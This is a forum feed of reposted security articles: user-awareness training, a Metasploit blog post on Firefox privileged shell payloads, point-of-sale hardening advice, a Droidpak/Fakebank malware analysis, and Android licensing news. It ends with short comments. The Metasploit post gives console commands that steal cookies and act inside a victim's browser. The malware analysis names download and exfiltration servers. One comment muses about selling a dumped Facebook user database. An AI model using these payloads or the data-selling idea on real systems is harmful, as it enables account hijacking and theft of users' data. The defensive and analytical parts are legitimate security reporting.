engineering, phishing and malware which pinpoints the low safety precautionms of the average Internet user as responsibilities for Web safety appear to end with installing anti-virus software and ignoring the safe use of the Internet. Related queries for “virus” appear to be “anti virus”, “virus download”, “antivirus”, “virus scan”, “free anti virus”, “avg”, “avg virus”, “virus removal”, “virus protection”, among others which show the overall direction of the users’ input in terms of the keyword “virus”. We can conclude from the above illustrations that the need for Web safety and security awareness is as high as ever pinpointing the need for ameliorating the current security awareness programs that companies undertake. If I have to educate and not train, what should I change? Firstly, you should start by organizing group lunches with a security-oriented purpose. Each employee would appreciate a good lunch and/or dessert so the attendance of such meetings will be high. Such an informal meeting is a great way to get your staff together and talk about security issues. Most likely, organizing lunches once or twice a week for different groups will raise the security awareness of your staff without having to resort to dry lectures but by resorting to overall participation and group-wide discussion instead. In these lunches, you can begin to sort out regular attendees who have the potential to become champions within the different work groups and who can later on help educate the other employees in their group. Secondly, you can try to bring in outside security professionals as they are usually eager to get CPEs (continuing professional education) credits, even more if you add some goodwill gesture. The local security pros may present security issues or discuss security with your employees. Thirdly, you should provide your employees information on maintaining Internet safety at home. Such discussions are always well-attended, even more so if you show them something relevant to them such as how to keep kids safe at home. The information must really affect them personally and they must find it relevant to make them focused and engaged so that they can absorb it. Links, whitepapers and any kind of training on such topics would be well-accepted. Fourthly, you should make appointments with business unit leaders to discuss security issues and topics relevant to their area. It does not have to be in the office, more informal settings are also beneficial. The point here is that it is important to show them that you are pondering over their problems and attempting to remedy them, in this way they can understand and help with your concerns as well. Fifthly, the old way of hanging posters on the wall and dispersing newsletters can also be efficient. The posters have to be attention-grabbing and have to be replaced frequently. A column in a newsletter would be beneficial if it is interesting and relevant. Tips are usually not interesting and relevant as they are self-serving unless they provide some advice on safety at home which automatically makes them relevant. Sixthly, anecdotes and metaphors may help spread the word. For instance, you can rely on the story of Ali Baba to teach the staff about password security, strength and shoulder surfing. Seventhly, create a security mentoring/tutoring option. It is possible that nobody sign up for it but if someone does you should enable him to take advantage of such an option. The mentoring may include one-on-one sessions and would help in pinpointing gifted employees as regards to security awareness and would help shape a champion among your employees who would educate the others during the course of work. Eightly, you should offer your employees ride-alongs whereby you give them the opportunity to take a look at how the IT or security program actually looks like from the inside. The opposite should be done as well – making IT and security staff take a glimpse of how a day in the workplace of the employees looks like may also be useful. Finally, you should strive to create an environment of teamwork as it is proven that good teamwork has several positive features that come with it, such as: Better problem solving capabilities Quicker completion of tasks Competition which leads personnel to excel at what they do Bringing a combination of different unique qualities on the table may lead to better efficiency in the employees’ decision-making (references as regards these four features can be found at the bottom of the article) As Henry Ford once said “Coming together is a beginning. Keeping together is progress. Working together is success.” Testing the human firewall Testing the human firewall is easy so you can effortlessly track the company’s progress. The first and most employed way to test the human firewall is through written tests which come in the form of online multiple-choice tests and usually take place after a computer-based learning session. Alternatively, you can test the human firewall with a seemingly real social engineering attack. You have various techniques at your disposal for the attack: pretexting, phishing, theft with diversion, tailgating, quid pro quo or any combination of these. You can resort to websites such as phishme.com to fake a phishing campaign against your company, do the attack yourself or hire external security professionals to raise the bar even higher. Below are 3 sample questions that may be used in multiple-choice tests and 3 open questions that require written answer. Similar questions can be used when testing your personnel’s security awareness. What are some important tips when it comes to improving the human firewall? Simple labels that classify data as protected and unprotected such as “confidential” and “public” are a great place to start. Prohibiting password reuse and teaching the human firewall good password habits is crucial. The security staff has to become more accessible to the employees. This, on its own, will motivate the latter to share their problems and ask questions, on the one hand, and will aid the security staff in assessing the efficiency of their security programs, on the other hand. When reporting the results from security awareness tests, it is preferable to share them either anonymously or statistically. Though, if negative trends arise from particular employees or groups of employees, share those results with the proper persons and attempt to solve those issues without putting any blame on the people who fall behind with their security education. Teach employees not to store any company data on their smartphone Teach personnel not to connect USB drives, external hard disks or any writeable media to the workplace computer To reduce social engineering attacks against your employees, limit the information that can be gathered about your employees during the reconnaissance stage of the attack (this involves educating them not to divulge too much about information about themselves in the public domain) Remove any organization charts which reveal the employees names, job positions and photos from the company’s public website. Teach the personnel to handle external contacts properly through systematic training. Teach the personnel not to respond to accusations instantaneously but to turn to colleagues, legal staff, etc. before handling complaints. Teach personnel to limit the information they provide in social networks and other public domain sources such as Facebook. Conclusion It can be concluded from our discussion above that attempts at improving the human firewall have already started worldwide. Their success varies depending on factors such as the preliminary awareness of the factors, the enforceability and rigidity of the laws in the particular country, inter alia. Most methods of improving the human firewall involve modifying strategies that are already taking place in the companies such as transforming the type of information delivered to employees into a way that makes it relevant to the employees and that makes it affect them personally or transforming posters and newsletters in a way that excludes any tips and includes anecdotes and metaphors which will encourage the employees to read these advices and ease them in remembering the rules, whereas some involve a totally new strategy for some companies – like performing ride-alongs so the IT staff can better understand the other employees and vice-versa. We have also seen that testing the results from such security awareness education does not take a lot of effort but it is highly valuable as it can reveal the weak spots or the weakest links of your human firewall. Finally, we have provided some advices that resolve relatively recent issues that have emerged as regards to the operation of the human firewall. For instance, prohibiting the storage of company data on smartphones is a one possible solution to the BYOD problem that has emerged only recently. References: Richard O’Hanley, James S. Tiller and others, ‘Information Security Management Handbook, 6th edition, Volume 7? Munir Kotadia, “‘Human firewall’ a crucial defence: Mitnick”, Apr 14, 2005, Available at: 'Human firewall' a crucial defence: Mitnick | ZDNet Laneye, ‘Managers under attack’, Available at: Social Engineering - Managers under attack Business Wire, ‘New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013?, Jan 23, 2013, Available at: New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013 | Business Wire University of California, MERCED, ‘Security Self-Test: Questions and Scenarios’, Available at: Security Self-Test: Questions and Scenarios | Information Technology Ken Hess, ‘The second most important BYOD security defense: user awareness’, Feb 25, 2013, Available at: The second most important BYOD security defense: user awareness | ZDNet LePine, Jeffery A., Ronald F. Piccolo, Christine L. Jackson, John E. Mathieu, and Jessica R. Saul (2008). “A Meta-Analysis of Teamwork Processes: Tests of a Multidimensional Model and Relationships with Team Effectiveness Criteria”. Personnel Psychology 61 (2): 273–307. Hoegl, Martin, and Hans Georg Gemuenden (2001). “Teamwork Quality and the Success of Innovative Projects: a Theoretical Concept and Empirical Evidence”.Organization Science 12 (4): 435–449 By Ivan Dimov|January 24th, 2014 Sursa: Improving the Human Firewall - InfoSec Institute
  18. New Metasploit Payloads for Firefox Javascript Exploits Posted by joev in Metasploit on Jan 23, 2014 3:57:54 PM Those of you with a keen eye on metasploit-framework/master will notice the addition of three new payloads: firefox/shell_reverse_tcp firefox/shell_bind_tcp firefox/exec These are Javascript payloads meant for executing in a privileged Javascript context inside of Firefox. By calling certain native functions not meant to be exposed to ordinary web content, a classic TCP command shell can be opened. To a pentester, these payloads are useful for popping platform-independent in-process shells on a remote Firefox instance. How does it work? Firefox contains a Javascript API called XPCOM which consists of privileged native methods primarily implemented as C++ bindings. This API is commonly invoked by Firefox Addons and is also used by the "glue" code running inside the Firefox browser itself. If you can find a way to run Javascript code with access to XPCOM - either by convincing the user to install an untrusted addon or by finding a privilege escalation exploit in Firefox itself - you can open a raw TCP socket and run executables with Javascript. By using some shell redirection, we can get a working command shell connection back to a metasploit instance. We currently have three Firefox privilege escalation exploits in the framework: exploit/multi/browser/firefox_svg_plugin (Firefox 17.* + Flash) exploit/multi/browser/firefox_proto_crmfrequest (Firefox 5-15.*) exploit/multi/browser/firefox_xpi_bootstrapped_addon (all versions) Why is it better? The Javascript payloads are able to maintain shell sessions without dropping a native exe to the disk, which makes their presence significantly harder to detect. Another immediate benefit is that our existing Firefox exploits can now be included in BrowserAutopwn, since the target is static. Additionally, since the payload still has access to the Firefox Javascript environment, we can just as easily eval Javascript code, which makes things like cookie extraction or XSS attacks very easy. As an example I wrote a post module, post/firefox/gather/xss. To use it, simply specify the URL you want to run under and specify a SCRIPT option. The SCRIPT will be eval()'d by the payload and any results will be printed: msf> use post/firefox/gather/xss msf> set SESSION 1 msf> set URL https://rapid7.com msf> set SCRIPT "send(document.cookie);" [+] id=f612814001be908ds79f Or, with a slightly more advanced script which sends a tweet in the target browser: msf> set URL https://twitter.com msf> set SCRIPT "$('.tweet-box').find('.tweet-box').focus().text('Metasploit Courtesy Tweet').parents('form').find('.tweet-button button').click(); return 'sent';" [+] sent Note: You can use return or send to send back data, but you can only send once. If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. Sursa: https://community.rapid7.com/community/metasploit/blog/2014/01/23/firefox-privileged-payloads
  19. Tech Insight: Defending Point-of-Sale Systems John H. Sawyer US-CERT publishes advice on defending POS systems against attacks like those against Target, Neiman Marcus. Major hacks at retailers that include Target and Neiman Marcus have put a new spotlight on the security of point of sale (POS) systems. What may come as a surprise to some is that the memory-scraping malware attacks were nothing new. Last year, Visa published two "Visa Data Security Alerts" warning merchants of an increase in attacks targeting credit card data with specific references to memory-scraping malware. The alerts were published in April and August. The first stated that Visa has seen an increase in network intrusions involving grocery merchants since January 2013. August's update used nearly the same verbiage but mentioned retail instead of grocery. The part that's of particular interest is how the attackers were carrying out the attacks. "Once inside the merchant's network, the hacker will install memory parser malware on the Windows based cash register system in each lane or on Back-of-the-House (BOH) servers to extract full magnetic stripe data in random access memory (RAM)." With two notices earlier in the year, retailers breached in the 4th quarter had early notification that attacks specifically targeting POS systems had been seen increasing. The alerts from Visa even included details on how to protect POS and related PCI systems from the types of attacks being carried out. So how is it that companies who were considered PCI compliant had their POS devices and PCI environment compromised? From a penetration tester's perspective, it is all too common to find merchants considered compliant as not necessarily secure. As an industry, we've been saying for years that compliance does not equal security and these big data breaches are classic examples. It is easy to fill out a form that certain controls are in place, but the harsh reality is that rarely are those controls actually tested thoroughly to ensure their effectiveness at protecting cardholder data. US CERT, part of the Department of Homeland Security, issued Alert TA14-002A on January 2, 2014 titled "Malware Targeting Point of Sale Systems." The document discusses hardware and software attacks against POS systems and includes specific recommendations on protecting them. Unlike the Visa Alerts, US CERT has put together guidance that focuses specifically on security best practices without mentioning specialized hardware and software (i.e. EMV-enabled PIN-entry, SRED-enabled devices, PA-DSS compliant payment applications). Alert TA14-002A targets 6 areas that POS administrators should follow: Use Strong Passwords: During the installation of POS systems, installers often use the default passwords for simplicity on initial setup. Unfortunately, the default passwords can be easily obtained online by cybercriminals. It is highly recommended that business owners change passwords to their POS systems on a regular basis, using unique account names and complex passwords. Default passwords are the low-hanging fruit that penetration testers tend to go for first. It's amazing how often network devices and application servers are set up on a network with default passwords in place. Whether it's an administration interface for Apache Tomcat or something like HSRP for Cisco routers, it's difficult to find a network that doesn't have at least one system with a default password. A vulnerability scanner like Nessus or NeXpose can help with finding these default passwords, but manual verification should be done also, as vulnerability scanners don't have the default passwords for every device. Update POS Software Applications:Ensure that POS software applications are using the latest updated software applications and software application patches. POS systems, in the same way as computers, are vulnerable to malware attacks when required updates are not downloaded and installed on a timely basis. Keeping POS applications updated should be part of the patch management strategy for every merchant. The common hurdle is that new versions generally cost money, which causes companies to avoid upgrades until technical problems arise. While the risks to POS software can sometimes be mitigated through other security controls like host intrusion prevention software (HIPS) and firewalls, it's important that merchants remember that new versions also bring security and bug fixes that can help keep cardholder data safe -- they'll need to bite the bullet eventually and upgrade. Install a Firewall: Firewalls should be utilized to protect POS systems from outside attacks. A firewall can prevent unauthorized access to, or from, a private network by screening out traffic from hackers, viruses, worms, or other types of malware specifically designed to compromise a POS system. A key tenet of the PCI DSS is network segmentation and firewalls are essential. Host- and network-based firewalls should be utilized as part of a layered security approach. Traffic should only be allowed to and from the POS to systems that are similarly hardened against attack. Where possible, the traffic should also be monitored by an intrusion detection/prevention system to detect and/or prevent attacks. Use Antivirus: Antivirus programs work to recognize software that fits its current definition of being malicious and attempts to restrict that malware's access to the systems. It is important to continually update the antivirus programs for them to be effective on a POS network. US-CERT is on target with its advice to use updated antivirus, but anti-malware protections should not stop there. Merchants should consider implementing a full endpoint protection suite that includes antivirus, HIPS, firewall, traffic inspection, and application whitelisting. While these solutions are not foolproof, they raise the bar for exploitation considerably. Restrict Access to Internet: Restrict access to POS system computers or terminals to prevent users from accidentally exposing the POS system to security threats existing on the Internet. POS systems should only be utilized online to conduct POS-related activities and not for general Internet use. Unless the POS application specifically needs Internet access, then it should be completely firewalled off from the Internet. In the situation that the POS software does need to communicate with systems on the Internet, firewalls should be used to strictly block all traffic except that to authorized systems. Application proxies should be used to proxy and inspect traffic to and from the Internet. Disallow Remote Access: Remote access allows a user to log into a system as an authorized user without being physically present. Cybercriminals can exploit remote access configurations on POS systems to gain access to these networks. To prevent unauthorized access, it is important to disallow remote access to the POS network at all times. This is the only area of advice from US-CERT that might be considered overkill, as it's going to make authorized remote management impossible. With proper firewall configurations restricting access only to authorized management workstations and multi-factor authentication, remote access is perfectly acceptable. Of course, this is where companies get in trouble as they aren't always diligent in ensuring firewalls configurations are correct and the machines accessing them are secured. POS systems are not difficult to secure if merchants would simply follow the advice that has been put out by Visa and the US-CERT. Most of the advice is based on security best practices that have been around for years. Unfortunately, it often takes a data breach for companies to have their eyes opened to the impact their negligence can have on their customers and their brand. Will Target, Neiman Marcus, and other retailers' recent troubles be the impetus companies need to secure their systems or will they have to experience it firsthand? Sursa: Tech Insight: Defending Point-of-Sale Systems -- Dark Reading
  20. Discovered first Win trojan to serve banking Android malware on mobile by paganinip on January 25th, 2014 Symantec experts recently came across a Windows malicious code that attempts to infect connected Android devices serving an Android malware. Researchers at Symantec antivirus firm have discovered a malicious code that is able to infect Android mobile device with a banking malware during synchronization. The Android malware that was designed to hit Windows user could compromise user’s Smartphone during file transfer, device syncing and backup management operation. The infection process starts with a trojan, dubbed by security experts Trojan.Droidpak, that drops a malicious DLL and it registers it as a system service. Droidpak then downloads a configuration file from the following remote server: http://xia2.dy[REMOVED]s-web.com/iconfig.txt The file contains the information to download a malicious APK and storing it to the following location on the infected PC: %Windir%\CrainingApkConfig\AV-cdk.apk The Android malware detected by the analysts seems to be specifically designed for the Korean population because the malicious APK searches for certain Korean online banking applications on the infected device. The communication between the mobile device and the compromised PC is realized by a software bridge called Android Debug Bridge (ADB), it is a command line tool that allows the malicious code to execute commands on Android Smartphone connected to the infected computer. The Android Debug Bridge is a legitimate tool included in the Android software development kit (SDK), when victim connect an Android device having USB debugging Mode enabled, it launches installation process and infect the Smartphone dropping the Android Malware. Once the Android malware has infected the device, it installs an app that will appear as a Google App Store. Android is the most targeted OS by cyber criminals because its large diffusion, numerous families of malware were created in 2013 to hit mobile users and an increasing number of hack tools was available in the underground to hack such powerful platform. The peculiarity of Trojan.Droidpak is that for the first time a Windows malware was used to install a banking trojan on a mobile device. The banking trojan, dubbed as Android.Fakebank.B, implements common features of this category of malware, including SMS interception and “MITM capabilities”. Researchers at Symantec discovered that the Android.Fakebank.B malware sends back data to the following attacker’s server: http://www.slmoney.co.kr[REMOVED] The experts provided a few suggestions to protect the user’s system from the Android malware while connecting to a windows based computer: Turn off USB debugging on your Android device, when you are not using it Avoid connecting your droid with public computers Only Install reputable security software Keep your System, Softwares and Antivirus up-to-date. Pierluigi Paganini (Security Affairs – Android Malware, Banking trojan) Sursa: https://www.facebook.com/
  21. Why Google Android software is not as free or open-source as you may think Basic Android software may be free, but it doesn’t include the apps that make up Google’s mobile services Android software is free and open-source, but without Google Play, a device will have minimal functionality. Photograph: Beawiharta/Reuters Charles Arthur and Samuel Gibbs Thursday 23 January 2014 16.44 GMT • This article was amended on 24 January 2014 to reflect a clarification from Google that it does not charge manufacturers for Android licenses. The idea that Google’s Android mobile software is both “free” and open-source is so often repeated that it is virtually an article of faith online. There’s only one problem: neither is strictly true. While the basic Android software is indeed available for free, and can be downloaded, compiled and changed by anyone, it doesn’t include the apps that make up Google’s mobile services - such as Maps, Gmail, and crucially Google Play, which allows people to connect to the online store where they can download apps. Without them, a device has only minimal functionality. To get the key apps, a manufacturer needs a “Google Mobile Services” (GMS) licence. GMS licences are issued on a per-model basis. While Google does not charge a fee for the licence, one of the integral steps in the licence-application process requires payment to authorised Android-testing factories. These factories, which include Foxconn and Archos, charge a fee for carrying out the testing required to obtain a GMS licence, which the Guardian understands is negotiated on a case-by-case, per-manufacturer basis. Google activates more than 1 million devices with GMS licences every day The Guardian understands that in one example, testing costs $40,000, payable 50% up front and 50% at the completion of testing for a model with an expected run of at least 30,000 units. The source said Google and its testing partners were being intentionally vague about the fact that a cost is associated with acquisition of a GMS licence, even if the licence itself is free. “It is a lot of money they make, but you can’t see it anywhere because that would tarnish their ‘Android open-source’ karma,” the source said. However, there’s no definitive price list for GMS licence process; the authorised testing factories are understood to vary this depending on the number of devices being ordered and the size of the manufacturer or retailer. “Deals are done on an individual basis and are very opaque,” one source in the Android device community, who didn’t want to be identified, told the Guardian. Google didn’t respond to a request for information about GMS pricing, and there is no publicly available list online. Haphazard and time-consuming But the process of getting GMS licences appears to be haphazard and time-consuming. “Installing Google Play without a GMS licence is illegal,” the source said. But, they explained, Google “don’t have the internal manpower to police it properly. It’s a volume game. Big OEMs [device manufacturers] pay. Smaller OEMs don’t register in Google’s radar, and they [Google] tend to turn a blind eye. Retailers get pressured by legal OEMs to make sure illegal installs of GMS are weeded out. It’s almost like crowdsourcing.” That “crowdsourcing” seems to have been KMS Components’ downfall. Argos complained to the Welsh company that the MyTablet which it had provided did not have a GMS licence. This was after Argos had publicly promoted the tablet as excitement about a “tablet Christmas” ramped up following Tesco’s announcement in September that it would sell its Hudl 7in tablet. Although Google could take out injunctions to prevent retailers selling unlicensed tablets that include GMS, there’s no record of it ever having done so. However in August 2010 Augen Electronics, the maker of a $150 tablet being sold through the giant American retail chain Kmart, abruptly withdrew it from sale there because it included “unauthorised versions” of the GMS suite. Compatibility club Separately, trial documents released from a dispute between Google and Skyhook, a provider of location services, in 2011 revealed internal emails in which Dan Morrill of Google told another staffer that it’s “obvious to the OEMs that we are using [GMS] compatibility as a club to make them do what we want.” Motorola, then an independent company, told Skyhook that Android devices are “approved essentially at Google’s discretion”. Skyhook had wanted Android device makers to use its location service rather than Google’s. Android compatibility testing is a key precursor step to being awarded a GMS licence. But such testing, and subsequently getting a licence from Google, can be a test in its own right, sources say. One described having to take the matter up with a senior Google vice-president to get the GMS licensing approved. “Smaller OEMs lose out, as they have a hard time getting the GMS licence, and therefore have little alternative but to go without it,” the source said. Yet it is possible to bypass that. End-users can legally install the GMS suite of apps if they know how to. The idea that Android is “open source” is partially true: the source code for the software is available online, via Google’s servers, and anyone can download it and make changes - as Amazon, for example, has done to create its own version for its Kindle line of tablets. But unlike the vast majority of widely used open-source projects such as Linux, MySQL, PHP or Python, which welcome outside contributors, only people working inside Google can make changes that will become part of the future direction of the software. Device manufacturers who want to get the upcoming version of Android have to wait for it to become available from Google’s servers. Sursa: Why Google Android software is not as free or open-source as you may think | Technology | theguardian.com
  22. Nytro

    Fun stuff

    https://www.youtube.com/watch?v=ITR88wT8ekM&desktop_uri=%2Fwatch%3Fv%3DITR 88wT8ekM&app=desktop
  23. Nytro

    Fun stuff

  24. Dupa astia cu SQL-I, asta e noua generatie de "hackeri". Se alege praful de lumea asta.
  25. Sa ai acces la datele unei firme care valoreaza in jur de 100 de miliarde de dolari? Depinde cat si unde ai avea acces. Daca ai face un dump la tabelul facebook_users, valoarea sa ar trece usor de 10 milioane de $. Daca l-ai vinde Chinei sau Rusiei probabil ti-ai lua o insula exotica si cateva mii de virgine. Bine, nu doar utilizatorii, mai sunt si mesaje private, poze/videoclipuri private si multe alte lucruri utile: liste de prieteni, event-uri, locatii vizitate, adrese IP si cine mai stie ce date o pastra Facebook.
×
×
  • Create New...